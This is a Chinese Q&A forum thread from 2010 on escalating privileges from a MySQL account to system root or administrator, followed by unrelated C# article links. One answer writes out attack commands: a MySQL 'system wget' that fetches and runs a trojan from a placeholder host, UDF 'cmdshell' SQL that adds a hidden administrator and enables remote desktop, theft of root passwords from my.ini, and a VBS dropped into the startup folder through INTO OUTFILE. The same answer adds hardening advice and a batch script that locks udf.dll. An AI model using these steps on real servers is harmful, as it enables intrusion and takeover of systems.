有linux系统下mysql的普通帐号,请教如何进行提权,一般情况下是否可以得到linux root,以及我们该如何来防护通过mysql普通帐号提权得到更高权限。

2010-11-07 01:57:50

3 Answers

整理了好久,发出来喷喷。

一、提权
linux下:
1.有MySQL的root用户可以通过system函数提权得到linux root。比如:

mysql>system wget http://xxxxx.com/muma.exe ;
mysql>system chmod +x muma.exe;
mysql>system ./muma.exe;

以上方法经验证无效。system函数是执行本地的shell命令而已。

2.有webshell的情况直接上传Linx Mysql Door(通过webshell Mysql.php直接安装),

实际上也是利用system函数。

windows下:
在有webshell的情况下可以进行提权,也就是说首先要上传一个webshell到服务器(php

网页木马,一般使用PHPSPY)。之后分为两种情况:
1.有MySQL普通帐号,且有MySQL的插入、删除、创建函数的权限:
1)使用webshell连接MySQL数据库,填入MySQL普通帐号。
2)在webshell提供的SQL执行的地方,导出udf.dll到系统目录。
3)执行以下SQL语句,添加系统管理员账号,开3389远程连接等。

select cmdshell('net user admins 226404553 /add'); 
select cmdshell('net localgroup administrators admins    /add'); 
select cmdshell('regedit /s d:\wwwroot\3389.reg')
select cmdshell('c:\3389.exe'); 
drop function cmdshell; 记得删除函数,不留痕迹

2.没有MySQL帐号: 1)使用webshell查看C:\boot.ini(确定操作系统版本以便后续入侵)、 C:\windows\my.ini(获得MySQL root账号密码)。若my.ini被删除,使用webshell查看phpinfo.php,获得网站绝对路径,如:D:/wwwroot/xxx/,然后读取php或配置文件查找MySQL root账号密码。还可以下载MySQL的user.myd表,本地搭建MySQL查看表内容。 2)后面的操作就是使用udf.dll提权了。当使用udf.dll提权失败时,还可以通过写vbs到启动项的方法进行提权:


create table a (cmd text); insert into a values ("set wshshell=createobject (""wscript.shell"") "); insert into a values ("a=wshshell.run (""cmd.exe /c net user iis_user123!@#abcABC /add"",0) " ); insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators iis_user /add"",0) " ); select * from a into outfile "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\a.vbs";


二、防范

1.删除user.myd表、phpinfo、information_schemata(防止跨库攻击)。

2.做好上传漏洞的防范工作

3.开启MySQL内部支持的SSL,为了远程连接数据库做协议加密,防止被骇客窃听数据。

4.用户、管理员账号的密码使用新版的MD5和SHA做加密,防止user表下载本地爆破密码。

5.参考MySQL安全配置文档、apache+php+mysql安全配置全攻略。


windows:

1.限制用户对C盘根目录下的文件访问,防止骇客窥视C:\boot.ini、C:\windows\my.ini。

2.禁止wscript.shell组件使用。

3.关闭、删除3389远程登录服务。

4.删除udf.dll和langouster_udf.dll,新建udf.dll和langouster_udf.dll设为只读,权限上限制,也可防止所有langouster_udf.dll专用网马。新建批处理文件并运行,如下:


Code:net stop mysql

del %SystemRoot%/system32/udf.dll /A/F/Q

del %SystemRoot%/udf.dll /A/F/Q

del %SystemRoot%/temp/udf.dll /A/F/Q

dir %SystemRoot%/system32/com > %SystemRoot%/system32/udf.dll

dir %SystemRoot%/system32/com > %SystemRoot%/udf.dll

dir %SystemRoot%/system32/com > %SystemRoot%/temp/udf.dll

attrib +R +S +H %SystemRoot%/system32/udf.dll

attrib +R +S +H %SystemRoot%/udf.dll

attrib +R +S +H %SystemRoot%/temp/udf.dll


cscript.exe xcacls.vbs "%SystemRoot%/system32/udf.dll" /D Everyone:M /E

cscript.exe xcacls.vbs "%SystemRoot%/udf.dll" /D Everyone:M /E

cscript.exe xcacls.vbs "%SystemRoot%/temp/udf.dll" /D Everyone:M /E


del %SystemRoot%/system32/langouster_udf.dll /A/F/Q

del %SystemRoot%/langouster_udf.dll /A/F/Q

del %SystemRoot%/temp/langouster_udf.dll /A/F/Q

dir %SystemRoot%/system32/com > %SystemRoot%/system32/langouster_udf.dll

dir %SystemRoot%/system32/com > %SystemRoot%/langouster_udf.dll

dir %SystemRoot%/system32/com > %SystemRoot%/temp/langouster_udf.dll

attrib +R +S +H %SystemRoot%/system32/langouster_udf.dll

attrib +R +S +H %SystemRoot%/langouster_udf.dll

attrib +R +S +H %SystemRoot%/temp/langouster_udf.dll

cscript.exe xcacls.vbs "%SystemRoot%/system32/langouster_udf.dll" /D Everyone:M /E

cscript.exe xcacls.vbs "%SystemRoot%/langouster_udf.dll" /D Everyone:M /E

cscript.exe xcacls.vbs "%SystemRoot%/temp/langouster_udf.dll" /D Everyone:M /E

net start mysql


Linux:

1.使用sudo命令进制system函数执行。

2.若不需要SSH远程登录,彻底删除SSH服务。

2010-11-07 04:18:32

mysql 5.x里面引入了一个system函数,这个函数可以执行系统命令
非常之委琐``
这个是可以提权的至于怎么防范我不太清楚

2010-11-07 05:39:34

system mysql -unewuser -hhost -pnewuserpass
remark:这个只是临时切换到newuser用户。当退出的时候 先退出到 执行system 时候的用户。
可以任意存在用户之间切换

2010-11-07 07:06:55
您不能回答该问题或者回答已经关闭!

相关文章推荐

  • C#开发中的反射机制

    反射的定义:审查元数据并收集关于它的类型信息的能力。元数据(编译以后的最基本数据单元)就是一大堆的表,当编译程序集或者模块时,编译器会创建一个类定义表,一个字段定义表,和一个方法定义表等

  • C#实例解析适配器设计模式

    将一个类的接口变成客户端所期待的另一种接口,从而使原本因接口不匹配而无法在一起工作的两个类能够一起工作

  • C#中using指令的几种用法

    using + 命名空间名字,这样可以在程序中直接用命令空间中的类型,而不必指定类型的详细命名空间,类似于Java的import,这个功能也是最常用的,几乎每个cs的程序都会用到

  • C#协变和逆变

    “协变”是指能够使用与原始指定的派生类型相比,派生程度更大的类型,“逆变”则是指能够使用派生程度更小的类型

  • C#运行时相互关系

    C#运行时相互关系,包括运行时类型、对象、线程栈和托管堆之间的相互关系,静态方法、实例方法和虚方法的区别等等

  • 使用托管C++粘合C#和C++代码(二)

    本文实现一下C++代码调用C#代码的过程。我构造一个简单并且直观的例子:通过C++ UI 触发C# UI.

  • C#开发高性能Log Help类设计开发

    项目中要在操作数据库的异常处理中加入写Log日志,对于商业上有要求,写log时对其它操作尽可能影响小,不能因为加入log导致耗时太多

  • C#中的索引器的简单理解和用法

    C#中的类成员可以是任意类型,包括数组和集合。当一个类包含了数组和集合成员时,索引器将大大简化对数组或集合成员的存取操作

  • Async和Await使异步编程更简单

    C#5.0中async和await两个关键字,这两个关键字简化了异步编程,之所以简化了,还是因为编译器给我们做了更多的工作

  • 使用托管C++粘合C#和C++代码(一)

    C#在xml读写,数据库操纵,界面构造等很多方面性能卓越;C++的效率高,是底层开发的必备武器

  • C#基础概念之延迟加载

    延迟加载(lazy load)是Hibernate3关联关系对象默认的加载方式,延迟加载机制是为了避免一些无谓的性能开销而提出来的,所谓延迟加载就是当在真正需要数据的时候,才真正执行数据加载操作

  • 深入C# 序列化(Serialize)、反序列化(Deserialize)

    C#中的序列化和反序列化,序列化是.NET运行时环境用来支持用户定义类型的流化的机制